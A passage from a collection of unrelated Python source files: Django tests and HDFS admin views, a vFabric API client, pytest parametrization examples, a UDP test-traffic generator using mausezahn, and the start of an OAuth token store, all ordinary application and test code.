result = summary_overall(queryset)
self.assertEqual(
result['overall'],
Decimal(150.55).quantize(Decimal('0.01'), rounding=ROUND_HALF_UP)
)
|
from django.apps import AppConfig
class FuturecostsConfig(AppConfig):
name = 'futurecosts'
|
# ---------------------------------------------------------------------
# inv.inv log plugin
# ---------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from .base import InvPlugin
class LogPlugin(InvPlugin):
name = "log"
js = "NOC.inv.inv.plugins.log.LogPanel"
def get_data(self, request, o):
return {
"id": str(o.id),
"name": o.name,
"model": o.model.name,
"log": [
{
"ts": x.ts.isoformat(),
"user": x.user,
"system": x.system,
"managed_object": x.managed_object,
"op": x.op,
"message": x.message,
}
for x in o.get_log()
],
}
|
from fastparquet import ParquetFile
import seaborn as sns
import matplotlib.pyplot as plt
import os
import pandas as pd
import numpy as np
from src.data.make_dataset import DataLoader
def load_all():
df = ParquetFile(os.path.join(project_dir, 'data', 'interim', 'data.parq')).to_pandas().set_index('date')
data_size = df.groupby(['modality', 'user']).size().unstack()
def parquet_heatmap():
pf = ParquetFile(os.path.join(project_dir, 'data', 'interim', 'data.parq'))
df = pf.to_pandas(filters=[('user', '==', 194), ('modality', '==', 'cpm')]).set_index('date') # .drop(['modality', 'user'], axis=1)
print(df.shape)
data = DataLoader.convert_to_npy(df, save=False)
p = sns.heatmap(np.nan_to_num(data[:, :, 0]))
plt.show(p)
def npy_heatmap():
data = np.load(os.path.join(project_dir, 'data', 'interim', 'data.npy')).astype(np.float32)[:, :-1]
print(data.shape)
p = sns.heatmap(data[:100, :, 0])
plt.show(p)
if __name__=='__main__':
project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)
df = ParquetFile(os.path.join(project_dir, 'data', 'interim', 'data.parq')).to_pandas(filters=[('user', '==', 194)]).set_index('date')
modality_data = list()
for modality, m_group in df.groupby('modality'):
modality_data.append(m_group.drop(['modality', 'user'], axis=1))
# We concatenate on dates to ensure the same dimension across modalities
fig, ax = plt.subplots(ncols=2, figsize=(10, 30))
sns.heatmap(pd.concat(modality_data, axis=1).values.reshape(-1, 6, 288)[:, -1, :], ax=ax[0])
sns.heatmap(modality_data[-1], ax=ax[1])
plt.show(fig) |
from django.db import connection
from django.http import JsonResponse
from django.shortcuts import render
import requests
import json
from administer.models import Services, Nodes
from django.contrib import messages
from administer import context_processors
from configuration.models import Restart_after_configuration
from hdfs.models import Hdfs
from administer.helper import helper
def index(request):
obj = helper(request, Hdfs)
client = True
context = context_processors.base_variables_all(request)
if obj.atleast_one_client_is_installed():
if obj.clientIsInstalledOnMaster():
master = obj.get_active_master()
if master:
master_ip = master["ip"]
context["master_ip"] = master_ip
context["master_id"] = master["id"]
port = master["web_port"]
context["client"] = client
else:
messages.error(request,
"Sorry !! due to some problem we are unable to fetch the information from server."
" You can perform following steps to find the problem and then restart the services."
"<ul>"
"<li> Reload after 10 seconds</li>"
"<li> Restart again</li>"
"<li> Check the log of Namenode and Datanode</li>"
"<li> make there is no problem in configuration file </li> "
"</ul>")
s_master = obj.get_service_master()
if s_master:
context["master_ip"] = s_master["ip"]
context["master_id"] = s_master["id"]
context["error_in_conf_file"] = True
context["client"] = client
return render(request, 'hdfs/hdfs.html', context)
else:
messages.error(request, "We have encountered some problems."
"Please make sure following conditions are met"
"<ul>"
"<li> Client is installed on master node</li>"
"<li> Environment variables for all services are set properly</li>"
"<li> Restart agent on master node [url here]</li>")
context["client"] = False
return render(request, 'hdfs/hdfs.html', context)
else:
messages.error(request, "Seems like no client is installed")
context["client"] = False
return render(request, 'hdfs/hdfs.html', context)
all_nodes = obj.get_all_nodes()
cursor = connection.cursor()
node_with_client = "select h.ip from hdfs_hdfs as h join administer_nodes " \
"as n on h.ip=n.ip "
masters_sql = "select h.*,n.hostname,n.fqdn,n.name from hdfs_hdfs as h left outer join administer_nodes " \
"as n on h.ip=n.ip where h.type=1"
slave_with_client = "select h.*,hm.*,n.hostname,n.fqdn,n.name from hdfs_hdfs as h join administer_nodes as n on " \
"h.ip=n.ip join hdfs_metrics as hm on h.id=hm.node_id " \
"where h.type=0 and hm.updated_at in (select max(updated_at) " \
"from hdfs_metrics limit 1)"
slave_without_client = "select h.*,hm.* from hdfs_hdfs as h join hdfs_metrics as hm on h.id=hm.node_id " \
"where h.type=0 and h.ip not in (" + node_with_client + ") and hm.updated_at in " \
"(select max(updated_at) from hdfs_metrics limit 1)"
name_livenodes = []
name_deadnodes = []
standby_data = {}
cursor.execute(masters_sql)
masters = cursor.fetchall()
colnames = [desc[0] for desc in cursor.description]
for node in masters:
c = dict(zip(colnames, node))
print()
print()
print(c)
client_installed = True
if c["ip"] not in all_nodes:
client_installed = False
if c["type"] == 1 and c["state"] == 1:
safemode = c["safemode"]
active_data = c
if c["type"] == 1 and c["state"] == 0:
c["client_installed"] = client_installed
standby_data = c
if c["type"] == 1 and c["state"] == 2:
c["client_installed"] = client_installed
standby_data = c
cursor.execute(slave_with_client)
nodes_with_client = cursor.fetchall()
colnames = [desc[0] for desc in cursor.description]
for node in nodes_with_client:
c = dict(zip(colnames, node))
client_installed = True
if c["ip"] not in all_nodes:
client_installed = False
c["client_installed"] = client_installed
if c["status"] == "RUNNING":
name_livenodes.append(c)
else:
name_deadnodes.append(c)
cursor.execute(slave_without_client)
nodes_without_client = cursor.fetchall()
for node in nodes_without_client:
c = dict(zip(colnames, node))
client_installed = True
if c["ip"] not in all_nodes:
client_installed = False
c["client_installed"] = client_installed
if c["status"] == "RUNNING":
name_livenodes.append(c)
else:
name_deadnodes.append(c)
service_object = Services.objects.get(name='hdfs')
restart_status_checks = Restart_after_configuration.objects.filter(service_id=service_object.id).exists()
if restart_status_checks:
restart_status_check = Restart_after_configuration.objects.get(service_id=service_object.id)
restart_status = restart_status_check.status
else:
restart_status = 0
context['name_livenodes'] = name_livenodes
context['name_deadnodes'] = name_deadnodes
context['restart_status'] = restart_status
context['active_node'] = active_data
context['standby_node'] = standby_data
context["safemode"] = safemode
context["service_id"] = service_object.id
return render(request, 'hdfs/hdfs.html', context)
# def prepare_alive_dead_node_list(colnames, lst, all_nodes):
# alive = []
# dead = []
# for node in lst:
# c = dict(zip(colnames, node))
# client_installed = True
# if c["ip"] not in all_nodes:
# client_installed = False
#
# c["client_installed"] = client_installed
# if node[3] == "RUNNING":
# name_livenodes.append(c)
# else:
# name_deadnodes.append(c)
#
# return alive, dead
def dn_restart(request):
obj = helper(request)
if request.POST['node_ip'] is not '':
node_ip = request.POST['node_ip']
else:
data = {'success': 0,
'msg': "We are unable to get the IP of the datanode. Please hard refresh the page and try again"}
return JsonResponse(data)
try:
node = obj.get_node_data(node_ip)
url = 'http://%s:%s/hadoop/datanode/restart/' % (node_ip,node["port"])
resp = obj.restart_service(url)
return JsonResponse(resp)
except Exception as e:
data = {'success': 0, 'msg': e}
return JsonResponse(data)
def dn_stop(request):
obj = helper(request)
if request.POST['node_ip'] is not '':
node_ip = request.POST['node_ip']
else:
data = {'success': 0,
'msg': "We are unable to get the IP of the datanode. Please hard refresh the page and try again"}
return JsonResponse(data)
try:
node = obj.get_node_data(node_ip)
url_stop = 'http://%s:%s/hadoop/datanode/stop/' % (node_ip,node["port"])
return JsonResponse(obj.stop_service(url_stop))
except Exception as e:
data = {'success': 0, 'msg': e}
return JsonResponse(data, safe=False)
def nn_restart(request):
obj = helper(request)
if request.POST['node_ip'] is not '':
node_ip = request.POST['node_ip']
else:
data = {'success': 0,
'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
return JsonResponse(data)
try:
node = obj.get_node_data(node_ip)
url = 'http://%s:%s/hadoop/namenode/restart/' % (node_ip,node["port"])
data = obj.restart_service(url)
return JsonResponse(data)
except Exception as e:
data = {'success': 0, 'msg': e.args}
return JsonResponse(data)
def nn_stop(request):
obj = helper(request)
if request.POST['node_ip'] is not '':
node_ip = request.POST['node_ip']
else:
data = {'success': 0,
'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
return JsonResponse(data)
try:
node = obj.get_node_data(node_ip)
url_stop = 'http://%s:%s/hadoop/namenode/stop/' % (node_ip,node["port"])
data = obj.stop_service(url_stop)
return JsonResponse(data)
except Exception as e:
data = {'success': 0, 'msg': e}
return JsonResponse(data, safe=False)
def h_all_restart(request):
if request.POST['node_ip'] is not '':
node_ip = request.POST['node_ip']
else:
data = {'success': 0,
'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
return JsonResponse(data)
obj = helper(request=request, model=Hdfs)
op_status = obj.restart_all("hadoop/dfs/restart/", master_ip=node_ip)
if op_status["success"]:
Restart_after_configuration.objects.filter(service_id=obj.get_service_id("hdfs")).update(status=0)
return JsonResponse(op_status)
def h_all_stop(request):
obj = helper(request=request, model=Hdfs)
return JsonResponse(obj.stop_all("hadoop/dfs/stop/"))
def h_kill(request):
obj = helper(request=request, model=Hdfs)
if request.POST['node_ip'] is not '':
node_ip = request.POST['node_ip']
else:
data = {'success': 0,
'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
return JsonResponse(data)
if request.POST['node_id'] is not '':
node_id = request.POST['node_id']
else:
data = {'success': 0,
'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
return JsonResponse(data)
node = obj.get_node_data(node_ip)
if request.POST['server_type'] is not '':
server_type = request.POST['server_type']
if server_type == 'NameNode':
url_start = 'http://%s:%s/hadoop/namenode/start/' % (node_ip,node["port"])
else:
url_start = 'http://%s:%s/hadoop/datanode/start/' % (node_ip,node["port"])
else:
data = {'success': 0,
'msg': "Sorry we didnot receive some of the required data. Please hard refresh the page and try again"}
return JsonResponse(data)
if request.POST['action_type'] is not '':
action_type = request.POST['action_type']
else:
data = {'success': 0,
'msg': "Sorry we didnot receive some of the required data. Please hard refresh the page and try again"}
return JsonResponse(data)
url = "http://%s:%s/command/kill/" % (node_ip,node["port"])
try:
payload = {"service_name": server_type, "node_id": node_id, "table_name": "hdfs_hdfs"}
r = requests.post(url, headers={"API-KEY": helper.get_api_key()}, data=json.dumps(payload))
if r.status_code != 200:
return JsonResponse({'success': 0, 'msg': 'server threw status code ' + r.status_code})
data = r.json()
if data["success"] == 1:
if action_type == "1":
try:
r_start = requests.get(url_start, headers={"API-KEY": helper.get_api_key()},
data=json.dumps({"cluster_id": int(obj.cluster_id)}))
if r_start.status_code != 200:
return r_start.json()
if r_start.json()['success'] != 1:
return r_start.json()
except Exception as e:
data = {'success': 0, 'msg': e.args}
return JsonResponse(data)
else:
return JsonResponse(data)
except ConnectionError as e:
data = {'success': 0, 'msg': e}
return JsonResponse(data)
|
# vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vas.shared.Deletable import Deletable
from vas.shared.MutableCollection import MutableCollection
from vas.shared.Resource import Resource
class InstallationImages(MutableCollection):
"""A collection of installation images
:ivar `vas.shared.Security.Security` security: The resource's security
"""
def __init__(self, client, location, installation_image_class):
super(InstallationImages, self).__init__(client, location, 'installation-images', installation_image_class)
def create(self, path, version):
"""Creates an installation image by uploading a file to the server and assigning it a version
:param str path: The path of the file to upload
:param str version: The installation image's version
:rtype: :class:`vas.shared.InstallationImages.InstallationImage`
:return: The new installation image
"""
return self._create_multipart(path, {'version': version})
class InstallationImage(Resource, Deletable):
"""A product binary, typically are .zip or .tar.gz file, that has been uploaded to the server. Once created, an
installation image can then be used to create an installation on a group.
:ivar `vas.shared.Installations.Installations` installations: The installations that have been created from the
installation image
:ivar `vas.shared.Security.Security` security: The resource's security
:ivar int size: The installation image's size
:ivar str version: The installation image's version
"""
@property
def installations(self):
self.__installations = self.__installations or self._create_resources_from_links('installation',
self.__installation_class)
return self.__installations
@property
def size(self):
return self.__size
@property
def version(self):
return self.__version
def __init__(self, client, location, installation_class):
super(InstallationImage, self).__init__(client, location)
self.__installation_class = installation_class
self.__size = self._details['size']
self.__version = self._details['version']
def reload(self):
"""Reloads the installation image's details from the server"""
super(InstallationImage, self).reload()
self.__installations = None
def __str__(self):
return "<{} version={} size={}>".format(self.__class__.__name__, self.__version, self.__size)
|
from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.urls import reverse
from bills.models import BillSet, Bill
from houses.models import House
from utils.models import BillFile
class BillsViewsTests(TestCase):
def setUp(self):
self.client = Client()
User = get_user_model()
self.user = User.objects.create_user(username='FredFlintstone', email='fred@flintstone.com', password='babadoo')
self.user2 = User.objects.create_user(username='JackyFlintstone', email='jacky@flintstone.com', password='lovefred')
house = House.objects.create(user=self.user)
house.place_id = 'EiwyNTI5IFN0YWxsaW9uIERyLCBPc2hhd2EsIE9OIEwxSCA3SzQsIENhbmFkYSIxEi8KFAoSCY_JD3vDG9WJEe3JFhlBvwOKEOETKhQKEgnrS9FlwxvViRHYx20MM9m-8g'
house.lat = '43.95858010000001'
house.lon = '-78.91587470000002'
house.street_number = 2529
house.street_name = 'Stallion Drive'
house.city = 'Oshawa'
house.prov_state = 'ON'
house.postal_code = 'L1H 0M4'
house.country = 'Canada'
house.save()
self.house = house
self.billset = BillSet.objects.create(month=11, year=2019, house=self.house)
self.bill = Bill.objects.create(set=self.billset, user=self.user, type='ELEC', date='2019-11-04', amount=299.99)
def test_bill_delete_view_get(self):
print('Testing bills.views.bill_delete() GET')
self.client.force_login(self.user)
bill_pre_count = Bill.objects.count()
billset_pre_count = BillSet.objects.count()
response = self.client.get(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
bill_post_count = Bill.objects.count()
billset_post_count = BillSet.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'houses/house_detail.html')
self.assertNotContains(response, '404')
self.assertNotContains(response, 'Login')
self.assertEqual(bill_post_count, bill_pre_count)
self.assertEqual(billset_post_count, billset_pre_count)
def test_bill_delete_view_get_not_logged_in(self):
print('Testing bills.views.bill_delete() GET not logged in')
self.client.logout()
bill_pre_count = Bill.objects.count()
billset_pre_count = BillSet.objects.count()
response = self.client.get(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
bill_post_count = Bill.objects.count()
billset_post_count = BillSet.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'account/login.html')
self.assertNotContains(response, '404')
self.assertContains(response, 'Login')
self.assertEqual(bill_post_count, bill_pre_count)
self.assertEqual(billset_post_count, billset_pre_count)
def test_bill_delete_view_get_wrong_user(self):
print('Testing bills.views.bill_delete() GET wrong user')
self.client.force_login(self.user2)
bill_pre_count = Bill.objects.count()
billset_pre_count = BillSet.objects.count()
response = self.client.get(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
bill_post_count = Bill.objects.count()
billset_post_count = BillSet.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'main/404.html')
self.assertContains(response, '404')
self.assertNotContains(response, 'Login')
self.assertEqual(bill_post_count, bill_pre_count)
self.assertEqual(billset_post_count, billset_pre_count)
def test_bill_delete_view_post(self):
print('Testing bills.views.bill_delete() POST')
self.client.force_login(self.user)
self.bill2 = Bill.objects.create(set=self.billset, user=self.user, type='WATER', date='2019-11-04', amount=500.99)
bill_pre_count = Bill.objects.count()
billset_pre_count = BillSet.objects.count()
response = self.client.post(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
bill_post_count = Bill.objects.count()
billset_post_count = BillSet.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'houses/house_detail.html')
self.assertNotContains(response, '404')
self.assertNotContains(response, 'Login')
self.assertLess(bill_post_count, bill_pre_count)
self.assertEqual(billset_post_count, billset_pre_count)
def test_bill_delete_view_post_remove_empty_set(self):
print('Testing bills.views.bill_delete() POST also remove empty billset')
self.client.force_login(self.user)
bill_pre_count = Bill.objects.count()
billset_pre_count = BillSet.objects.count()
response = self.client.post(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
bill_post_count = Bill.objects.count()
billset_post_count = BillSet.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'houses/house_detail.html')
self.assertNotContains(response, '404')
self.assertNotContains(response, 'Login')
self.assertLess(bill_post_count, bill_pre_count)
self.assertLess(billset_post_count, billset_pre_count)
def test_bill_delete_view_post_not_logged_in(self):
print('Testing bills.views.bill_delete() POST not logged in')
self.client.logout()
bill_pre_count = Bill.objects.count()
billset_pre_count = BillSet.objects.count()
response = self.client.post(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
bill_post_count = Bill.objects.count()
billset_post_count = BillSet.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'account/login.html')
self.assertNotContains(response, '404')
self.assertContains(response, 'Login')
self.assertEqual(bill_post_count, bill_pre_count)
self.assertEqual(billset_post_count, billset_pre_count)
def test_bill_delete_view_post_wrong_user(self):
print('Testing bills.views.bill_delete() POST wrong user')
self.client.force_login(self.user2)
bill_pre_count = Bill.objects.count()
billset_pre_count = BillSet.objects.count()
response = self.client.post(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
bill_post_count = Bill.objects.count()
billset_post_count = BillSet.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'main/404.html')
self.assertContains(response, '404')
self.assertNotContains(response, 'Login')
self.assertEqual(bill_post_count, bill_pre_count)
self.assertEqual(billset_post_count, billset_pre_count)
def test_bill_add_file_get(self):
print('Testing bills.views.bill_add_file() GET')
self.client.force_login(self.user)
billfile_pre_count = BillFile.objects.count()
response = self.client.get(reverse('bill_add_file', kwargs={'pk': self.bill.id}, ), follow=True)
billfile_post_count = BillFile.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'bills/bill_add_file.html')
self.assertContains(response, self.bill.set.house)
self.assertNotContains(response, '404')
self.assertNotContains(response, 'Login')
self.assertEqual(billfile_post_count, billfile_pre_count)
def test_bill_add_file_get_not_logged_in(self):
print('Testing bills.views.bill_add_file() GET not logged in')
self.client.logout()
billfile_pre_count = BillFile.objects.count()
response = self.client.get(reverse('bill_add_file', kwargs={'pk': self.bill.id}, ), follow=True)
billfile_post_count = BillFile.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'account/login.html')
self.assertNotContains(response, self.bill.set.house)
self.assertNotContains(response, '404')
self.assertContains(response, 'Login')
self.assertEqual(billfile_post_count, billfile_pre_count)
def test_bill_add_file_get_wrong_user(self):
print('Testing bills.views.bill_add_file() GET wrong user')
self.client.force_login(self.user2)
billfile_pre_count = BillFile.objects.count()
response = self.client.get(reverse('bill_add_file', kwargs={'pk': self.bill.id}, ), follow=True)
billfile_post_count = BillFile.objects.count()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'main/404.html')
self.assertNotContains(response, self.bill.set.house)
self.assertContains(response, '404')
self.assertNotContains(response, 'Login')
self.assertEqual(billfile_post_count, billfile_pre_count) |
#!/usr/bin/env python2
import sys
from os.path import dirname, realpath
sys.path.append(realpath(dirname(__file__)))
import gimpfu as gfu
from gimpfu import main
from _plugin_base import GimpPluginBase
class FaceGen(GimpPluginBase):
def run(self, img_layer, mask_layer, mask_m_layer):
self.model_file = 'MaskGAN.py'
result = self.predict(img_layer, mask_layer, mask_m_layer)
self.create_layer(result)
plugin = FaceGen()
plugin.register(
proc_name="facegen",
blurb="facegen",
help="Running face gen...",
author="Kritik Soman",
copyright="",
date="2020",
label="facegen...",
imagetypes="RGB*",
params=
[
(gfu.PF_LAYER, "drawinglayer", "Original Image:", None),
(gfu.PF_LAYER, "drawinglayer", "Original Mask:", None),
(gfu.PF_LAYER, "drawinglayer", "Modified Mask:", None),
]
)
main()
|
#!/usr/bin/env python3
import math
print("Tartály festése" + "\n")
magassag = float(input("Milyen magas? "))
sugar = float(input("Mennyi az átmérője? ")) / 2
felulet = 2 * math.pi * sugar * (sugar + magassag)
dobozok_szama = felulet / 2
print(dobozok_szama, "doboz festék kell.")
|
class Newssources:
'''
newssources class to define news sources objects
'''
def __init__(self,id,name,description,url,category,language,country):
self.id = id
self.name = name
self.description = description
self.url = url
self.category = category
self.language = language
self.country = country
class Newsarticle:
'''
newsarticle class to define news article objects
'''
def __init__(self,source_id,source_name,author,title,description,url,urlToImage,publishedAt):
self.source_id = source_id
self.source_name = source_name
self.author = author
self.title = title
self.description = description
self.url = url
self.urlToImage = urlToImage
self.publishedAt = publishedAt |
import unittest
from src.graph import Graph
from src.breadth_first_search import bfs
class BreadthFirstSearchTest(unittest.TestCase):
def test_bfs_parses_the_graph_in_order(self):
"""
Correctly explore the following graph:
_(a)--(c)--(e)
/ | / \ |
(s)--(b)-------(d)
"""
edges = [('s', 'a'), ('s', 'b'), ('a', 'b'), ('a', 'c'), ('b', 'd'),
('c', 'e'), ('c', 'd'), ('e', 'd')]
graph = Graph.build(edges=edges)
expected = ['s', 'a', 'b', 'c', 'd', 'e']
actual = bfs(graph, 's')
self.assertEqual(actual, expected,
'should have visited the graph in correct order')
|
from pathlib import Path
import uvicorn
from fastapi import FastAPI
from fastapi.staticfiles import StaticFiles
from starlette.middleware.cors import CORSMiddleware
from app.core import config
from app.core.routes import core_router
def get_application() -> FastAPI:
application = FastAPI(title=config.PROJECT_NAME, debug=config.DEBUG)
application.add_middleware(
CORSMiddleware,
allow_origins=config.ALLOWED_HOSTS or ["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
application.include_router(core_router)
if Path(config.STATIC_ROOT).exists():
application.mount(config.STATIC_URL, StaticFiles(directory=config.STATIC_ROOT), name="static")
return application
app = get_application()
if __name__ == "__main__":
# entry point for starting the app as python script - `python main.py` will start the worker
uvicorn.run(app, host="0.0.0.0", port=8000)
|
"""Tests for register_mongodb.py"""
from flask import Flask
from flask_pymongo import PyMongo
from foca.database.register_mongodb import (
create_mongo_client,
register_mongodb,
)
from foca.models.config import MongoConfig
MONGO_DICT_MIN = {
'host': 'mongodb',
'port': 27017,
}
DB_DICT_NO_COLL = {
'my_db': {
'collections': None
}
}
DB_DICT_DEF_COLL = {
'my_db': {
'collections': {
'my_collection': {
'indexes': None,
}
}
}
}
DB_DICT_CUST_COLL = {
'my_db': {
'collections': {
'my_collection': {
'indexes': [{
'keys': {'indexed_field': 1},
'options': {'sparse': False}
}]
}
}
}
}
MONGO_CONFIG_MINIMAL = MongoConfig(**MONGO_DICT_MIN, dbs=None)
MONGO_CONFIG_NO_COLL = MongoConfig(**MONGO_DICT_MIN, dbs=DB_DICT_NO_COLL)
MONGO_CONFIG_DEF_COLL = MongoConfig(**MONGO_DICT_MIN, dbs=DB_DICT_DEF_COLL)
MONGO_CONFIG_CUST_COLL = MongoConfig(**MONGO_DICT_MIN, dbs=DB_DICT_CUST_COLL)
def test_create_mongo_client(monkeypatch):
"""When MONGO_USERNAME environement variable is NOT defined"""
monkeypatch.setenv("MONGO_USERNAME", 'None')
app = Flask(__name__)
res = create_mongo_client(
app=app,
)
assert isinstance(res, PyMongo)
def test_create_mongo_client_auth(monkeypatch):
"""When MONGO_USERNAME environement variable IS defined"""
monkeypatch.setenv("MONGO_USERNAME", "TestingUser")
app = Flask(__name__)
res = create_mongo_client(app)
assert isinstance(res, PyMongo)
def test_create_mongo_client_auth_empty(monkeypatch):
"""When MONGO_USERNAME environment variable IS defined but empty"""
monkeypatch.setenv("MONGO_USERNAME", '')
app = Flask(__name__)
res = create_mongo_client(app)
assert isinstance(res, PyMongo)
def test_register_mongodb_no_database():
"""Skip MongoDB client registration"""
app = Flask(__name__)
res = register_mongodb(
app=app,
conf=MONGO_CONFIG_MINIMAL,
)
assert isinstance(res, MongoConfig)
def test_register_mongodb_no_collections():
"""Register MongoDB database without any collections"""
app = Flask(__name__)
res = register_mongodb(
app=app,
conf=MONGO_CONFIG_NO_COLL,
)
assert isinstance(res, MongoConfig)
def test_register_mongodb_def_collections():
"""Register MongoDB with collection and default index"""
app = Flask(__name__)
res = register_mongodb(
app=app,
conf=MONGO_CONFIG_DEF_COLL,
)
assert isinstance(res, MongoConfig)
def test_register_mongodb_cust_collections(monkeypatch):
"""Register MongoDB with collections and custom indexes"""
monkeypatch.setattr(
'pymongo.collection.Collection.create_index',
lambda *args, **kwargs: None,
)
monkeypatch.setattr(
'pymongo.collection.Collection.drop_indexes',
lambda *args, **kwargs: None,
)
app = Flask(__name__)
res = register_mongodb(
app=app,
conf=MONGO_CONFIG_CUST_COLL,
)
assert isinstance(res, MongoConfig)
|
# FindStringusingRecursive.py
# Create a function that you return True if the exat word is find in the string or sentence
# string = "I love bananas and apples."
# is the word ana in the string/sentence? return True
# is the word live in the string/sentence ? return False
# if the string/sentence or the word is empty return False
def solution(string, substring, i=0):
string = ''.join(string.split()) # get rid of all spaces
if len(string) == 0 or len(substring) == 0: # if string is null return False
return False
if substring == string[0:len(substring)]: # if find the substring return True
return True
i += 1
find = solution(string[i:],substring,i)
if find: return True
else: return False
# Testing
print(solution("amora","amor"))
print(solution("O amor é lindo!","amora"))
|
class Solution:
def calPoints(self, ops: 'List[str]') -> int:
s = []
for op in ops:
if op == 'C':
s.pop()
elif op == 'D':
s.append(s[-1] * 2)
elif op == '+':
s.append(s[-1] + s[-2])
else:
s.append(int(op))
return sum(s)
if __name__ == "__main__":
print(Solution().calPoints(["5","2","C","D","+"]))
print(Solution().calPoints(["5","-2","4","C","D","9","+","+"])) |
"""
pytest.fixture() 允许fixture有参数化功能
@pytest.mark.parametrize 允许在测试函数或类中定义多组参数和fixtures
pytest_generate_tests 允许定义自定义参数化方案或扩展(拓展)
"""
import pytest
@pytest.mark.parametrize("test_input,expected", [("3+5", 8), ("2+4", 6), ("6*9", 42)])
def test_eval(test_input, expected):
print(f"测试数据{test_input},期望结果{expected}")
assert eval(test_input) == expected
@pytest.mark.parametrize('a, b, expect', [(1, 2, 3), (2, 3, 5), (4, 5, 6)])
class TestParametrize:
def test_parametrize_1(self, a, b, expect):
print('\n测试函数11111 测试数据为\n{}-{}'.format(a, b))
assert a + b == expect
def test_parametrize_2(self, a, b, expect):
print('\n测试函数22222 测试数据为\n{}-{}'.format(a, b))
assert a + b == expect
# 笛卡尔积,组合数据
data_1 = [1, 2, 3]
data_2 = ['a', 'b']
@pytest.mark.parametrize('a', data_1)
@pytest.mark.parametrize('b', data_2)
def test_parametrize_1(a, b):
print(f'笛卡尔积 测试数据为 : {a},{b}')
# 字典
data_1 = (
{
'user': 1,
'pwd': 2
},
{
'user': 3,
'pwd': 4
}
)
@pytest.mark.parametrize('dic', data_1)
def test_parametrize_2(dic):
print(f'测试数据为\n{dic}')
print(f'user:{dic["user"]},pwd{dic["pwd"]}')
# 标记参数化
@pytest.mark.parametrize("test_input,expected", [
("3+5", 8),
("2+4", 6),
pytest.param("6 * 9", 42, marks=pytest.mark.xfail),
pytest.param("6*6", 42, marks=pytest.mark.skip)
])
def test_mark(test_input, expected):
assert eval(test_input) == expected
# 增加可读性
data_1 = [
(1, 2, 3),
(4, 5, 9)
]
# ids
ids = ["a:{} + b:{} = expect:{}".format(a, b, expect) for a, b, expect in data_1]
# ids = ["1","2"] 多少组数据,就要有多少个id,然后组成一个id的列表,主要是为了更加清晰看到用例的含义
@pytest.mark.parametrize('a, b, expect', data_1, ids=ids)
class TestParametrize(object):
def test_parametrize_1(self, a, b, expect):
print('测试函数1测试数据为{}-{}'.format(a, b))
assert a + b == expect
def test_parametrize_2(self, a, b, expect):
print('测试函数2数据为{}-{}'.format(a, b))
assert a + b == expect
|
"""
Probability based traffic generator
"""
import os
import threading
import sched
import time
import sys
import random
import subprocess
DESTINATION = str(sys.argv[1])
PACKET_SIZE = int(sys.argv[2])
PROBABILITY = float(sys.argv[3])
RATE_IF_TRANS = int(sys.argv[4])
scheduler = sched.scheduler(time.time, time.sleep)
udp_packet_header_size = 42
packet_size = PACKET_SIZE - udp_packet_header_size
packet_count = int(RATE_IF_TRANS/(8*PACKET_SIZE))
delay = int(1/packet_count * 10**6)
delay_cmd = ""
if delay > 1:
delay_cmd = f"-d {delay}"
command = f"mz -A 11.0.0.1 -B {DESTINATION} -T udp -c {packet_count} -p {packet_size}"
def one_second_traffic():
if random.choices([True,False],[PROBABILITY,1-PROBABILITY])[0]:
print(f"packet size {PACKET_SIZE}")
print(f"rate {RATE_IF_TRANS}")
print(f"packet count {packet_count}")
print(command)
os.system(command)
def generate_tick():
scheduler.enter(1,1,generate_tick)
t = threading.Thread(target=one_second_traffic)
t.start()
generate_tick()
scheduler.run()
|
#!/usr/bin/env python
from oauth_client.config import settings
from redis import StrictRedis, ConnectionError
import json
import logging
from datetime import datetime
from filelock import Timeout, FileLock
class OAuthTokenStore:
"""
Generic method to save and retrieve values from file and redis backed token storage
"""
def __init__(self, ):
self._redis = StrictRedis.from_url(settings.MESSAGE_QUEUE.URL, charset="utf-8", decode_responses=True)
self._token_file = settings.OAUTH.TOKEN_CACHE
self._token_prepend = settings.OAUTH.TOKEN_KEY_PREPEND
self._access_code_prepend = f'{self._token_prepend}_accesscode'
self._token_refresh_prepend = f'{self._token_prepend}_refreshtoken'
self._token_access_prepend = f'{self._token_prepend}_accesstoken'
self._last = None # this is a bail out help if you happen to read auth code before you were ready to use it
try:
self._redis.ping()
except ConnectionError as e:
self._error = e
logging.warning(f'Redis connection error, please resolve, this module requires redis: {e.args}')
def _get_token_cache_data(self, client_id):
